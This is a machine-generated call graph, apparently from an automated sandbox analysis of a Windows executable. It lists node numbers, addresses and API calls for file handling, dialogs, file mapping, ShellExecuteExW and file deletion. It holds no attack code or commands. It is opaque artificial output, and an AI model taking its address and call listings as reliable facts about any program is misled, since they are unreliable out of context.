22006->22015 22126 a159fc 22007->22126 22010 a159c2 _free 20 API calls 22009->22010 22014 a15aff 22010->22014 22011 a15b18 22133 a15e3e 20 API calls _abort 22011->22133 22012 a15b3d HeapReAlloc 22012->22014 22012->22015 22014->21953 22015->22011 22015->22012 22134 a146ca 7 API calls 2 library calls 22015->22134 22024 9f9e13 22017->22024 22020->21971 22021 9fae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 22021->21977 22022->21986 22023->21980 22032 a0cec0 22024->22032 22027 9f9e08 22027->21975 22027->22021 22028 9f9e31 22034 9fb275 22028->22034 22030 9f9e45 22030->22027 22031 9f9e49 GetFileAttributesW 22030->22031 22031->22027 22033 9f9e20 GetFileAttributesW 22032->22033 22033->22027 22033->22028 22035 9fb282 22034->22035 22043 9fb28c 22035->22043 22044 9fb40f CharUpperW 22035->22044 22037 9fb29b 22045 9fb43b CharUpperW 22037->22045 22039 9fb2aa 22040 9fb2ae 22039->22040 22041 9fb325 GetCurrentDirectoryW 22039->22041 22046 9fb40f CharUpperW 22040->22046 22041->22043 22043->22030 22044->22037 22045->22039 22046->22043 22048 9f3f45 ___scrt_initialize_default_local_stdio_options 22047->22048 22051 a134dd 22048->22051 22054 a121bb 22051->22054 22055 a121e3 22054->22055 22056 a121fb 22054->22056 22071 a15e3e 20 API calls _abort 22055->22071 22056->22055 22057 a12203 22056->22057 22073 a12636 22057->22073 22060 a121e8 22072 a15d1d 26 API calls ___std_exception_copy 22060->22072 22064 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22065 9f3f4f GetFileAttributesW 22064->22065 22065->21964 22065->21965 22066 a1228b 22082 a1283c 51 API calls 3 library calls 22066->22082 22069 a12296 22083 a126b9 20 API calls _free 22069->22083 22070 a121f3 22070->22064 22071->22060 22072->22070 22074 a12653 22073->22074 22075 a12213 22073->22075 22074->22075 22084 a1631f GetLastError 22074->22084 22081 a12601 20 API calls 2 library calls 22075->22081 22077 a12674 22104 a1646e 38 API calls __fassign 22077->22104 22079 a1268d 22105 a1649b 38 API calls __fassign 22079->22105 22081->22066 22082->22069 22083->22070 22085 a16335 22084->22085 22088 a1633b 22084->22088 22106 a178f8 11 API calls 2 library calls 22085->22106 22090 a1638a SetLastError 22088->22090 22107 a15a8d 22088->22107 22090->22077 22091 a16355 22114 a159c2 22091->22114 22094 a1636a 22094->22091 22096 a16371 22094->22096 22095 a1635b 22097 a16396 SetLastError 22095->22097 22121 a16191 20 API calls _abort 22096->22121 22122 a15a4a 38 API calls _abort 22097->22122 22099 a1637c 22101 a159c2 _free 20 API calls 22099->22101 22103 a16383 22101->22103 22103->22090 22103->22097 22104->22079 22105->22075 22106->22088 22108 a15a9a ___InternalCxxFrameHandler 22107->22108 22109 a15ada 22108->22109 22110 a15ac5 RtlAllocateHeap 22108->22110 22123 a146ca 7 API calls 2 library calls 22108->22123 22124 a15e3e 20 API calls _abort 22109->22124 22110->22108 22111 a15ad8 22110->22111 22111->22091 22120 a1794e 11 API calls 2 library calls 22111->22120 22115 a159cd RtlFreeHeap 22114->22115 22119 a159f6 _free 22114->22119 22116 a159e2 22115->22116 22115->22119 22125 a15e3e 20 API calls _abort 22116->22125 22118 a159e8 GetLastError 22118->22119 22119->22095 22120->22094 22121->22099 22123->22108 22124->22111 22125->22118 22127 a15a3a 22126->22127 22132 a15a0a ___InternalCxxFrameHandler 22126->22132 22136 a15e3e 20 API calls _abort 22127->22136 22128 a15a25 RtlAllocateHeap 22130 a15a38 22128->22130 22128->22132 22130->22014 22132->22127 22132->22128 22135 a146ca 7 API calls 2 library calls 22132->22135 22133->22014 22134->22015 22135->22132 22136->22130 23910 a0d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23911 a11b40 5 API calls 2 library calls 23883 a09646 92 API calls 23912 a0d74a 28 API calls 2 library calls 22209 a09b4f 22210 a09b59 __EH_prolog 22209->22210 22369 9f12e7 22210->22369 22213 a0a230 22456 a0b8bc 22213->22456 22214 a09b9b 22217 a09c11 22214->22217 22218 a09ba8 22214->22218 22246 a09b87 22214->22246 22221 a09cb0 GetDlgItemTextW 22217->22221 22227 a09c2b 22217->22227 22222 a09be4 22218->22222 22223 a09bad 22218->22223 22219 a0a25c 22225 a0a265 SendDlgItemMessageW 22219->22225 22226 a0a276 GetDlgItem SendMessageW 22219->22226 22220 a0a24e SendMessageW 22220->22219 22221->22222 22224 a09ce7 22221->22224 22229 a09c05 KiUserCallbackDispatcher 22222->22229 22222->22246 22228 9fd142 54 API calls 22223->22228 22223->22246 22231 a09cff GetDlgItem 22224->22231 22367 a09cf0 22224->22367 22225->22226 22474 a08b8e GetCurrentDirectoryW 22226->22474 22232 9fd142 54 API calls 22227->22232 22233 a09bc7 22228->22233 22229->22246 22235 a09d13 SendMessageW SendMessageW 22231->22235 22236 a09d39 SetFocus 22231->22236 22237 a09c4d SetDlgItemTextW 22232->22237 22496 9f1227 SHGetMalloc 22233->22496 22234 a0a2a8 GetDlgItem 22241 a0a2c1 22234->22241 22242 a0a2c7 SetWindowTextW 22234->22242 22235->22236 22238 a09d55 22236->22238 22239 a09d49 22236->22239 22257 a09c5b 22237->22257 22258 9fd142 54 API calls 22238->22258 22244 9fd142 54 API calls 22239->22244 22241->22242 22475 a08fc8 GetClassNameW 22242->22475 22272 a09d53 22244->22272 22245 a09bce 22245->22246 22250 a09bd2 SetDlgItemTextW 22245->22250 22247 a0a1d0 22251 9fd142 54 API calls 22247->22251 22249 a09c68 GetMessageW 22249->22246 22249->22257 22250->22246 22253 a0a1e0 SetDlgItemTextW 22251->22253 22255 a0a1f4 22253->22255 22263 9fd142 54 API calls 22255->22263 22257->22246 22257->22249 22260 a09c8e TranslateMessage DispatchMessageW 22257->22260 22262 a09d87 22258->22262 22259 a09daa 22387 9f9cce 22259->22387 22260->22257 22261 a0a312 22267 a0a342 22261->22267 22271 9fd142 54 API calls 22261->22271 22268 9f3f5b _swprintf 51 API calls 22262->22268 22264 a0a21d 22263->22264 22269 9fd142 54 API calls 22264->22269 22266 a0aa45 91 API calls 22266->22261 22273 a0aa45 91 API calls 22267->22273 22320 a0a3fa 22267->22320 22268->22272 22269->22246 22277 a0a325 SetDlgItemTextW 22271->22277 22379 a0b70e GetDlgItem 22272->22379 22278 a0a35d 22273->22278 22274 a0a4aa 22279 a0a4b3 EnableWindow 22274->22279 22280 a0a4bc 22274->22280 22275 a09de6 22393 a09023 SetCurrentDirectoryW 22275->22393 22276 a09ddf GetLastError 22276->22275 22282 9fd142 54 API calls 22277->22282 22286 a0a36f 22278->22286 22307 a0a394 22278->22307 22279->22280 22283 a0a4d9 22280->22283 22505 9f12a4 GetDlgItem EnableWindow 22280->22505 22285 a0a339 SetDlgItemTextW 22282->22285 22291 a0a500 22283->22291 22299 a0a4f8 SendMessageW 22283->22299 22284 a09dfc 22289 a09e05 GetLastError 22284->22289 22290 a09e0f 22284->22290 22285->22267 22503 a0859c 6 API calls 22286->22503 22287 a0a3ed 22292 a0aa45 91 API calls 22287->22292 22289->22290 22298 a09e8a 22290->22298 22300 a09e9a 22290->22300 22301 a09e27 GetTickCount 22290->22301 22291->22246 22295 9fd142 54 API calls 22291->22295 22292->22320 22294 a0a4cf 22506 9f12a4 GetDlgItem EnableWindow 22294->22506 22303 a0a519 SetDlgItemTextW 22295->22303 22296 a0a388 22296->22307 22298->22300 22304 a0a0d3 22298->22304 22299->22291 22309 a09eb2 GetModuleFileNameW 22300->22309 22310 a0a06e 22300->22310 22305 9f3f5b _swprintf 51 API calls 22301->22305 22302 a0a488 22504 a0859c 6 API calls 22302->22504 22303->22246 22409 9f12c2 GetDlgItem ShowWindow 22304->22409 22312 a09e44 22305->22312 22307->22287 22315 a0aa45 91 API calls 22307->22315 22497 9fde7c 73 API calls 22309->22497 22310->22222 22319 9fd142 54 API calls 22310->22319 22394 9f94f1 22312->22394 22313 a0a4a7 22313->22274 22314 9fd142 54 API calls 22314->22320 22321 a0a3c2 22315->22321 22316 a0a0e3 22410 9f12c2 GetDlgItem ShowWindow 22316->22410 22318 a09edc 22324 9f3f5b _swprintf 51 API calls 22318->22324 22325 a0a082 22319->22325 22320->22274 22320->22302 22320->22314 22321->22287 22322 a0a3cb DialogBoxParamW 22321->22322 22322->22222 22322->22287 22323 a0a0ed 22411 9fd142 22323->22411 22327 a09efe CreateFileMappingW 22324->22327 22329 9f3f5b _swprintf 51 API calls 22325->22329 22331 a09f60 GetCommandLineW 22327->22331 22361 a09fdd __vswprintf_c_l 22327->22361 22333 a0a0a0 22329->22333 22336 a09f71 22331->22336 22332 a09e6a 22337 a09e71 GetLastError 22332->22337 22338 a09e78 22332->22338 22345 9fd142 54 API calls 22333->22345 22334 a09fe8 ShellExecuteExW 22358 a0a005 22334->22358 22498 a097e4 SHGetMalloc 22336->22498 22337->22338 22402 9f9437 22338->22402 22339 a0a10b SetDlgItemTextW GetDlgItem 22342 a0a124 GetWindowLongW SetWindowLongW 22339->22342 22343 a0a13c 22339->22343 22342->22343 22419 a0aa45 22343->22419 22344 a09f8d 22499 a097e4 SHGetMalloc 22344->22499 22345->22222 22349 a09f99 22500 a097e4 SHGetMalloc 22349->22500 22350 a0a048 22350->22310 22355 a0a05e UnmapViewOfFile CloseHandle 22350->22355 22351 a0aa45 91 API calls 22353 a0a158 22351->22353 22444 a0bc78 22353->22444 22354 a09fa5 22501 9fdfde 73 API calls ___scrt_get_show_window_mode 22354->22501 22355->22310 22358->22350 22362 a0a034 Sleep 22358->22362 22360 a09fbc MapViewOfFile 22360->22361 22361->22334 22362->22350 22362->22358 22367->22222 22367->22247 22370 9f1349 22369->22370 22371 9f12f0 22369->22371 22525 9fceb0 GetWindowLongW SetWindowLongW 22370->22525 22373 9f1356 22371->22373 22507 9fced7 22371->22507 22373->22213 22373->22214 22373->22246 22376 9f1325 GetDlgItem 22376->22373 22377 9f1335 22376->22377 22377->22373 22378 9f133b SetWindowTextW 22377->22378 22378->22373 22380 a0b76a SendMessageW SendMessageW 22379->22380 22381 a0b73a 22379->22381 22382 a0b7c1 SendMessageW SendMessageW SendMessageW 22380->22382 22383 a0b7a2 22380->22383 22386 a0b745 ShowWindow SendMessageW SendMessageW 22381->22386 22384 a0b80b SendMessageW 22382->22384 22385 a0b7ec SendMessageW 22382->22385 22383->22382 22384->22259 22385->22384 22386->22380 22390 9f9cd8 22387->22390 22388 9f9d69 22389 9f9e86 9 API calls 22388->22389 22391 9f9d92 22388->22391 22389->22391 22390->22388 22390->22391 22539 9f9e86 22390->22539 22391->22275 22391->22276 22393->22284 22395 9f94fb 22394->22395 22396 9f9565 CreateFileW 22395->22396 22397 9f9559 22395->22397 22396->22397 22398 9f95b7 22397->22398 22399 9fb275 2 API calls 22397->22399 22398->22332 22400 9f959e 22399->22400 22400->22398 22401 9f95a2 CreateFileW 22400->22401 22401->22398 22403 9f945b 22402->22403 22404 9f946c 22402->22404 22403->22404 22405 9f946e 22403->22405 22406 9f9467 22403->22406 22404->22298 22565 9f94a3 22405->22565 22560 9f95ea 22406->22560 22409->22316 22410->22323 22412 9fd172 22411->22412 22413 9fd17b LoadStringW 22412->22413 22414 9fd191 LoadStringW 22412->22414 22413->22414 22415 9fd1a3 22413->22415 22414->22415 22416 9fc91f 52 API calls 22415->22416 22417 9fd1b1 SetDlgItemTextW 22416->22417 22418 9f12c2 GetDlgItem ShowWindow 22417->22418 22418->22339 22420 a0aa4f __EH_prolog 22419->22420 22421 a0a14a 22420->22421 22422 a096ec ExpandEnvironmentStringsW 22420->22422 22421->22351 22433 a0aa86 _wcsrchr 22422->22433 22424 a096ec ExpandEnvironmentStringsW 22424->22433 22425 a0ad86 SetWindowTextW 22425->22433 22428 a120de 22 API calls 22428->22433 22430 a0ab77 SetFileAttributesW 22432 a0ac32 GetFileAttributesW 22430->22432 22442 a0ab6a ___scrt_get_show_window_mode 22430->22442 22435 a0ac40 DeleteFileW 22432->22435 22432->22442 22433->22421 22433->22424 22433->22425 22433->22428 22437 a0af50 GetDlgItem SetWindowTextW SendMessageW 22433->22437 22440 a0af92 SendMessageW 22433->22440 22433->22442 22580 a00b12 CompareStringW 22433->22580 22581 a08b8e GetCurrentDirectoryW 22433->22581 22582 9fa1a9 7 API calls 22433->22582 22585 9fa132 FindClose 22433->22585 22586 a09844 69 API calls ___std_exception_copy 22433->22586 22435->22442 22437->22433 22438 9f3f5b _swprintf 51 API calls 22439 a0ac75 GetFileAttributesW 22438->22439 22441 a0ac86 MoveFileW 22439->22441 22439->22442 22440->22433 22441->22442 22443 a0ac9e MoveFileExW 22441->22443 22442->22430 22442->22432 22442->22433 22442->22438 22583 9fb100 52 API calls 2 library calls 22442->22583 22584 9fa1a9 7 API calls 22442->22584 22443->22442 22445 a0bc82 __EH_prolog 22444->22445 22587 9ff165 69 API calls 22445->22587 22447 a0bcb3 22588 9f5bb7 69 API calls 22447->22588 22449 a0bcd1 22589 9f7b10 74 API calls 2 library calls 22449->22589 22451 a0bd15 22590 9f7c84 22451->22590 22453 a0bd24 22599 9f7ba0 22453->22599 22457 a0b8c9 22456->22457 23128 a08ac0 22457->23128 22460 a0b8d6 GetWindow 22461 a0a236 22460->22461 22464 a0b8f2 22460->22464 22461->22219 22461->22220 22462 a0b8ff GetClassNameW 23133 a00b12 CompareStringW 22462->23133 22464->22461 22464->22462 22465 a0b927 GetWindowLongW 22464->22465 22466 a0b988 GetWindow 22464->22466 22465->22466 22467 a0b937 SendMessageW 22465->22467 22466->22461 22466->22464 22467->22466 22468 a0b94d GetObjectW 22467->22468 23134 a08b22 GetDC GetDeviceCaps ReleaseDC 22468->23134 22471 a0b962 23135 a08adf GetDC GetDeviceCaps ReleaseDC 22471->23135 23136 a08cf3 8 API calls ___scrt_get_show_window_mode 22471->23136 22473 a0b972 SendMessageW DeleteObject 22473->22466 22474->22234 22476 a08fe9 22475->22476 22482 a0900e 22475->22482 23139 a00b12 CompareStringW 22476->23139 22478 a09013 SHAutoComplete 22479 a0901c 22478->22479 22483 a09485 22479->22483 22480 a08ffc 22481 a09000 FindWindowExW 22480->22481 22480->22482 22481->22482 22482->22478 22482->22479 22484 a0948f __EH_prolog 22483->22484 22485 9f137e 75 API calls 22484->22485 22486 a094b1 22485->22486 23140 9f1edd 22486->23140 22489 a094da 22492 9f18f6 127 API calls 22489->22492 22490 a094cb 22491 9f162e 79 API calls 22490->22491 22495 a094d6 22491->22495 22494 a094fc __vswprintf_c_l ___std_exception_copy 22492->22494 22493 9f162e 79 API calls 22493->22495 22494->22493 22495->22261 22495->22266 22496->22245 22497->22318 22498->22344 22499->22349 22500->22354 22501->22360 22503->22296 22504->22313 22505->22294 22506->22283 22526 9fc88e 22507->22526 22509 9fcefd GetWindowRect GetClientRect 22510 9fcff2 22509->22510 22511 9fcf57 22509->22511 22512 9fd034 GetSystemMetrics GetWindow 22510->22512 22513 9fcffc GetWindowTextW 22510->22513 22511->22512 22515 9fcfb8 GetWindowLongW 22511->22515 22519 9fd054 22512->22519 22529 9fc91f 22513->22529 22520 9fcfe2 GetWindowRect 22515->22520 22516 9f1312 22516->22373 22516->22376 22517 9fd028 SetWindowTextW 22517->22512 22518 9fd060 GetWindowTextW 22518->22519 22519->22516 22519->22518 22521 9fc91f 52 API calls 22519->22521 22522 9fd11b GetWindow 22519->22522 22523 9fd0a6 GetWindowRect 22519->22523 22520->22510 22524 9fd093 SetWindowTextW 22521->22524 22522->22516 22522->22519 22523->22522 22524->22519 22525->22373 22527 9fc91f 52 API calls 22526->22527 22528 9fc8b6 _wcschr 22527->22528 22528->22509 22530 9fc929 22529->22530 22531 9fc99d _strlen 22530->22531 22536 9fc9fb _wcschr _wcsrchr 22530->22536 22537 a00905 WideCharToMultiByte 22530->22537 22538 a00905 WideCharToMultiByte 22531->22538 22534 9fc9c8 _strlen 22535 9f3f5b _swprintf 51 API calls 22534->22535 22535->22536 22536->22517 22537->22531 22538->22534 22540 9f9e93 22539->22540 22541 9f9eb7 22540->22541 22542 9f9eaa CreateDirectoryW 22540->22542 22543 9f9dff 4 API calls 22541->22543 22542->22541 22544 9f9eea 22542->22544 22546 9f9ebd 22543->22546 22548 9f9ef9 22544->22548 22552 9fa0c3 22544->22552 22545 9f9efd GetLastError 22545->22548 22546->22545 22549 9fb275 2 API calls 22546->22549 22548->22390 22550 9f9ed3 22549->22550 22550->22545 22551 9f9ed7 CreateDirectoryW 22550->22551 22551->22544 22551->22545 22553 a0cec0 22552->22553 22554 9fa0d0 SetFileAttributesW 22553->22554 22555 9fa0e6 22554->22555 22556 9fa113 22554->22556 22557 9fb275 2 API calls 22555->22557 22556->22548 22558 9fa0fa 22557->22558 22558->22556 22559 9fa0fe SetFileAttributesW 22558->22559 22559->22556 22561 9f95f7 22560->22561 22562 9f95f3 22560->22562 22561->22562 22571 9f9dac 22561->22571 22562->22404 22566 9f94af 22565->22566 22568 9f94cd 22565->22568 22566->22568 22569 9f94bb CloseHandle 22566->22569 22567 9f94ec 22567->22404 22568->22567 22579 9f6d80 67 API calls 22568->22579 22569->22568 22572 a0cec0 22571->22572 22573 9f9db9 DeleteFileW 22572->22573 22574 9f9dcc 22573->22574 22575 9f9611 22573->22575 22576 9fb275 2 API calls 22574->22576 22575->22404 22577 9f9de0 22576->22577 22577->22575 22578 9f9de4 DeleteFileW 22577->22578 22578->22575 22579->22567 22580->22433 22581->22433 22582->22433 22583->22442 22584->22442 22585->22433 22586->22433 22587->22447 22588->22449 22589->22451 22591 9f7c8e 22590->22591 22596 9f7cf8 22591->22596 22625 9fa145 22591->22625 22593 9f7da4 22593->22453 22595 9f7d62 22595->22593 22631 9f6d0d 67 API calls 22595->22631 22596->22595 22597 9fa145 8 API calls 22596->22597 22603 9f820b 22596->22603 22597->22596 22600 9f7bae 22599->22600 22602 9f7bb5 22599->22602 22601 a00e21 79 API calls 22600->22601 22601->22602 22604 9f8215 __EH_prolog 22603->22604 22632 9f137e 22604->22632 22606 9f8230 22640 9f9ba2 22606->22640 22612 9f825f 22760 9f162e 22612->22760 22613 9f825b 22613->22612 22621 9fa145 8 API calls 22613->22621 22624 9f82fa 22613->22624 22764 9fb6cb CompareStringW 22613->22764 22616 9f835a 22663 9f1e8e 22616->22663 22621->22613 22622 9f8365 22622->22612 22667 9f3a20 22622->22667 22677 9f8409 22622->22677 22659 9f83a3 22624->22659 22626 9fa15a 22625->22626 22630 9fa15e 22626->22630 23116 9fa273 22626->23116 22628 9fa16e 22629 9fa173 FindClose 22628->22629 22628->22630 22629->22630 22630->22591 22631->22593 22633 9f1383 __EH_prolog 22632->22633 22766 9fc413 22633->22766 22635 9f13ba 22639 9f1413 ___scrt_get_show_window_mode 22635->22639 22772 a0cdae 22635->22772 22639->22606 22641 9f9bad 22640->22641 22643 9f8246 22641->22643 22797 9f6e66 67 API calls 22641->22797 22643->22612 22644 9f19b1 22643->22644 22645 9f19bb __EH_prolog 22644->22645 22652 9f19fd 22645->22652 22658 9f19e4 22645->22658 22798 9f135c 22645->22798 22647 9f1b16 22801 9f6d0d 67 API calls 22647->22801 22649 9f3a20 90 API calls 22653 9f1b6d 22649->22653 22650 9f1b26 22650->22649 22650->22658 22651 9f1bb7 22657 9f1bea 22651->22657 22651->22658 22802 9f6d0d 67 API calls 22651->22802 22652->22647 22652->22650 22652->22658 22653->22651 22655 9f3a20 90 API calls 22653->22655 22655->22653 22656 9f3a20 90 API calls 22656->22657 22657->22656 22657->22658 22658->22613 22660 9f83b0 22659->22660 22820 9fffb8 GetSystemTime SystemTimeToFileTime 22660->22820 22662 9f8314 22662->22616 22765 a006c8 65 API calls 22662->22765 22665 9f1e93 __EH_prolog 22663->22665 22664 9f1ec7 22664->22622 22665->22664 22822 9f18f6 22665->22822 22668 9f3a2c 22667->22668 22669 9f3a30 22667->22669 22668->22622 22670 9f3a5d 22669->22670 22673 9f3a4f 22669->22673 23043 9f276c 90 API calls 3 library calls 22670->23043 22672 9f3a8f 22672->22622 22673->22672 23042 9f3203 78 API calls 3 library calls 22673->23042 22675 9f3a5b 22675->22672 23044 9f1fd2 67 API calls 22675->23044 22678 9f8413 __EH_prolog 22677->22678 22679 9f844f 22678->22679 22687 9f8453 22678->22687 23073 a077e7 93 API calls 22678->23073 22680 9f8478 22679->22680 22684 9f84ff 22679->22684 22679->22687 22681 9f849a 22680->22681 22680->22687 23074 9f7a2f 151 API calls 22680->23074 22681->22687 23075 a077e7 93 API calls 22681->23075 22684->22687 23045 9f5d98 22684->23045 22687->22622 22688 9f858c 22688->22687 23053 9f80f8 22688->23053 22691 9f86e9 22692 9fa145 8 API calls 22691->22692 22693 9f874d 22691->22693 22692->22693 23057 9f7c11 22693->23057 22695 9fc57d 73 API calls 22699 9f87a7 _memcmp 22695->22699 22696 9f88d1 22697 9f89a0 22696->22697 22704 9f891f 22696->22704 22702 9f89fb 22697->22702 22713 9f89ab 22697->22713 22698 9f88ca 23078 9f6d0d 67 API calls 22698->23078 22699->22687 22699->22695 22699->22696 22699->22698 23076 9f80a6 75 API calls 22699->23076 23077 9f6d0d 67 API calls 22699->23077 22712 9f898f 22702->22712 23081 9f7f88 89 API calls 22702->23081 22703 9f89f9 22706 9f9437 72 API calls 22703->22706 22707 9f9dff 4 API calls 22704->22707 22704->22712 22705 9f8fb5 22708 9f9437 72 API calls 22705->22708 22706->22687 22710 9f8956 22707->22710 22708->22687 22710->22712 23079 9f9161 89 API calls 22710->23079 22711 9f8a64 22711->22705 22724 9f8acd 22711->22724 23082 9f971a 22711->23082 22712->22703 22712->22711 22713->22703 23080 9f7dc4 93 API calls ___InternalCxxFrameHandler 22713->23080 22714 9fa6a9 8 API calls 22717 9f8b1c 22714->22717 22720 9fa6a9 8 API calls 22717->22720 22719 9f8aa5 22719->22724 23086 9f1f18 67 API calls 22719->23086 22726 9f8b32 22720->22726 22722 9f8abb 23087 9f6f67 68 API calls 22722->23087 22724->22714 22725 9f8bd5 22727 9f8c1e 22725->22727 22728 9f8d22 22725->22728 22726->22725 23063 9f9869 22726->23063 22729 9f8c8e 22727->22729 22731 9f8c2e 22727->22731 22732 9f8d48 22728->22732 22733 9f8d34 22728->22733 22749 9f8c4e 22728->22749 22730 9f80f8 CharUpperW 22729->22730 22735 9f8ca9 22730->22735 22736 9f8c72 22731->22736 22741 9f8c3c 22731->22741 22738 a01fa9 68 API calls 22732->22738 22737 9f90d0 120 API calls 22733->22737 22743 9f8cd9 22735->22743 22744 9f8cd2 22735->22744 22735->22749 22736->22749 23089 9f77d4 101 API calls 22736->23089 22737->22749 22739 9f8d61 22738->22739 22742 a01c40 120 API calls 22739->22742 23088 9f1f18 67 API calls 22741->23088 22742->22749 23091 9f900e 85 API calls __EH_prolog 22743->23091 23090 9f7586 77 API calls ___InternalCxxFrameHandler 22744->23090 22748 9f8e6c 22748->22705 22750 9f8edb 22748->22750 23093 9f9b6a SetEndOfFile 22748->23093 22749->22748 23092 9f1f18 67 API calls 22749->23092 23068 9f9a12 22750->23068 22754 9f8f35 22755 9f94a3 68 API calls 22754->22755 22756 9f8f40 22755->22756 22756->22705 22757 9fa0c3 4 API calls 22756->22757 22758 9f8f9f 22757->22758 22758->22705 23094 9f1f18 67 API calls 22758->23094 22761 9f1640 22760->22761 23115 9fc4b6 79 API calls 22761->23115 22764->22613 22765->22616 22767 9fc41d __EH_prolog 22766->22767 22768 a0cdae new 8 API calls 22767->22768 22769 9fc460 22768->22769 22770 a0cdae new 8 API calls 22769->22770 22771 9fc484 22770->22771 22771->22635 22777 a0cdb3 ___std_exception_copy 22772->22777 22773 9f1400 22773->22639 22778 9fac66 22773->22778 22777->22773 22784 a146ca 7 API calls 2 library calls 22777->22784 22785 a0d83a RaiseException FindHandler new 22777->22785 22786 a0d81d RaiseException Concurrency::cancel_current_task FindHandler 22777->22786 22779 9fac70 __EH_prolog 22778->22779 22787 9fddc2 73 API calls 22779->22787 22781 9fac82 22788 9fad7e 22781->22788 22784->22777 22787->22781 22789 9fad90 ___scrt_get_show_window_mode 22788->22789 22792 9ffce6 22789->22792 22795 9ffca6 GetCurrentProcess GetProcessAffinityMask 22792->22795 22796 9facf8 22795->22796 22796->22639 22797->22643 22803 9f1705 22798->22803 22800 9f1378 22800->22652 22801->22658 22802->22657 22804 9f171b 22803->22804 22805 9f1773 __vswprintf_c_l 22803->22805 22806 9f1744 22804->22806 22816 9f6dd3 67 API calls __vswprintf_c_l 22804->22816 22805->22800 22808 9f179a 22806->22808 22813 9f1760 ___std_exception_copy 22806->22813 22810 a120de 22 API calls 22808->22810 22809 9f173a 22817 9f6e0b 68 API calls 22809->22817 22812 9f17a1 22810->22812 22812->22805 22819 9f6e0b 68 API calls 22812->22819 22813->22805 22818 9f6e0b 68 API calls 22813->22818 22816->22809 22817->22806 22818->22805 22819->22805 22821 9fffe8 __vswprintf_c_l 22820->22821 22821->22662 22823 9f18fb __EH_prolog 22822->22823 22824 9f1964 22823->22824 22825 9f1934 22823->22825 22829 9f190f 22823->22829 22831 9f3e69 22824->22831 22826 9f3a20 90 API calls 22825->22826 22826->22829 22829->22664 22833 9f3e72 22831->22833 22832 9f3a20 90 API calls 22832->22833 22833->22832 22835 9f1980 22833->22835 22848 9ff8f2 22833->22848 22835->22829 22836 9f1da1 22835->22836 22837 9f1dab __EH_prolog 22836->22837 22856 9f3aa3 22837->22856 22839 9f1dd4 22840 9f1705 69 API calls 22839->22840 22842 9f1e5b 22839->22842 22841 9f1deb 22840->22841 22886 9f187c 69 API calls 22841->22886 22842->22829 22844 9f1e03 22846 9f1e0f 22844->22846 22887 a006e9 MultiByteToWideChar 22844->22887 22888 9f187c 69 API calls 22846->22888 22849 9ff8f9 22848->22849 22851 9ff914 22849->22851 22854 9f6dce RaiseException FindHandler 22849->22854 22852 9ff925 SetThreadExecutionState 22851->22852 22855 9f6dce RaiseException FindHandler 22851->22855 22852->22833 22854->22851 22855->22852 22857 9f3aad __EH_prolog 22856->22857 22858 9f3adf 22857->22858 22859 9f3ac3 22857->22859 22860 9f3d1f 22858->22860 22864 9f3b0b 22858->22864 22925 9f6d0d 67 API calls 22859->22925 22944 9f6d0d 67 API calls 22860->22944 22863 9f3ace 22863->22839 22864->22863 22889 a00be0 22864->22889 22866 9f3b43 22893 a01fa9 22866->22893 22868 9f3b8c 22869 9f3c17 22868->22869 22885 9f3b83 22868->22885 22928 9fc57d 22868->22928 22906 9fa6a9 22869->22906 22870 9f3b88 22870->22868 22927 9f1fb8 69 API calls 22870->22927 22872 9f3b5a 22872->22868 22872->22870 22873 9f3b78 22872->22873 22926 9f6d0d 67 API calls 22873->22926 22878 9f3c2a 22879 9f3c9b 22878->22879 22880 9f3ca5 22878->22880 22910 9f90d0 22879->22910 22934 a01c40 22880->22934 22883 9f3ca3 22883->22885 22943 9f1f18 67 API calls 22883->22943 22921 a00e21 22885->22921 22886->22844 22887->22846 22888->22842 22890 a00bea __EH_prolog 22889->22890 22945 9ffb02 22890->22945 22892 a00cea 22892->22866 22894 a01fb8 22893->22894 22896 a01fc2 22893->22896 22964 9f6e0b 68 API calls 22894->22964 22897 a02002 22896->22897 22898 a02007 ___std_exception_copy 22896->22898 22905 a02060 ___scrt_get_show_window_mode 22896->22905 22966 a100ca RaiseException 22897->22966 22899 a02117 22898->22899 22902 a0203c 22898->22902 22898->22905 22967 a100ca RaiseException 22899->22967 22965 a01eca 68 API calls 3 library calls 22902->22965 22903 a0213a 22905->22872 22905->22905 22907 9fa6b6 22906->22907 22909 9fa6c0 22906->22909 22908 a0cdae new 8 API calls 22907->22908 22908->22909 22909->22878 22911 9f90da __EH_prolog 22910->22911 22968 9f7c6b 22911->22968 22914 9f135c 69 API calls 22915 9f90ec 22914->22915 22971 9fc658 22915->22971 22917 9f9146 22917->22883 22919 9fc658 115 API calls 22920 9f90fe 22919->22920 22920->22917 22920->22919 22980 9fc810 91 API calls __vswprintf_c_l 22920->22980 22922 a00e43 22921->22922 22990 9ffc30 22922->22990 22924 a00e5c 22924->22863 22925->22863 22926->22885 22927->22868 22929 9fc59e 22928->22929 22930 9fc5b0 22928->22930 23006 9f6195 73 API calls 22929->23006 23007 9f6195 73 API calls 22930->23007 22933 9fc5a8 22933->22869 22935 a01c72 22934->22935 22936 a01c49 22934->22936 22942 a01c66 22935->22942 23022 a0421d 120 API calls 2 library calls 22935->23022 22937 a01c68 22936->22937 22939 a01c5e 22936->22939 22936->22942 23021 a04f35 115 API calls 22937->23021 23008 a05984 22939->23008 22942->22883 22943->22885 22944->22863 22961 a0cdf0 22945->22961 22947 9ffb0c EnterCriticalSection 22948 9ffb30 22947->22948 22957 9ffb4e 22947->22957 22949 a0cdae new 8 API calls 22948->22949 22953 9ffb3a 22949->22953 22950 9ffb66 22954 a0cdae new 8 API calls 22950->22954 22951 9ffb95 LeaveCriticalSection 22952 9ffba1 22951->22952 22952->22892 22953->22957 22962 9ff930 71 API calls 22953->22962 22955 9ffb70 22954->22955 22958 9ffb8a LeaveCriticalSection 22955->22958 22963 9ff930 71 API calls 22955->22963 22957->22950 22957->22951 22958->22952 22960 9ffb88 22960->22958 22961->22947 22962->22957 22963->22960 22964->22896 22965->22905 22966->22899 22967->22903 22981 9fa8e0 22968->22981 22976 9fc66d __vswprintf_c_l 22971->22976 22972 9fc7b7 22973 9fc7df 22972->22973 22984 9fc5f7 22972->22984 22975 9ff8f2 2 API calls 22973->22975 22978 9fc7ae 22975->22978 22976->22972 22976->22978 22988 9fa791 85 API calls 22976->22988 22989 a077e7 93 API calls 22976->22989 22978->22920 22980->22920 22982 9fa8f4 GetVersionExW 22981->22982 22983 9f7c70 22981->22983 22982->22983 22983->22914 22985 9fc651 22984->22985 22986 9fc600 22984->22986 22985->22973 